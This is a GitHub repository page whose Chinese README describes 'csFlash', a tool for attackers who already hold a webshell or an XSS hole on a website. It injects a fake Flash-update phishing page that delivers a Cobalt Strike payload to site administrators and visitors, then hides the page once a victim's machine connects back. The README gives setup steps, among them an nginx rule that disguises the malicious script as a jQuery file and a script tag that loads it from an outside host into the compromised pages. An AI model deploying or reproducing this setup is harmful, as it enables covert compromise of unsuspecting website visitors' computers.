Skip to content

CtrlAltDelet/csFlash

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

csFlash

适用于拿到webshell后进行cs钓鱼

效果

当获取到webshell或站点存在xss漏洞时,想获得站点运维人员/网站访问人员主机权限,可在web中插入js钓鱼页面

参考 https://github.com/r00tSe7en/Flash-Pop image

此项目实现cs上线后自动隐藏钓鱼页面功能

使用方法

1.在CS-PushPlus/PushPlus.py配置好webhook的token,默认使用推送加,可自定义修改为钉钉、企业微信 image

并配置好数据库文件路径

image

2.配置好CS-PushPlus/PushPlus.cna文件中绝对路径

$cmd = 'python3 /CS-PushPlus/PushPlus.py' . " --computernam " . $computerName . " --externalip " . $externalIP . " --username " . $userName;

3.启动cs teamserver 、连接cna脚本置于后台

./agscript.sh 127.0.0.1 50050 User Pass ./CS-PushPlus/PushPlus.cna

4.启动js服务并置于后台,需要修改ssl证书信息 (也可使用http服务,但不建议,否则可能在https站点无法加载此js文件)

python3 flaskHttpd.py 

5.于nginx等web服务器配置,或开启防火墙使得能够通过路径访问到此flask服务

        location /public/common/libs/jquery/jquery-1.9.1.min.js {
                proxy_pass $flaskHttpd;
                }

6.替换项目中flash.exe文件,将flask的url插入到web页面中

<script src=https://xxxxx.com/public/common/libs/jquery/jquery-1.9.1.min.js> </script>

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages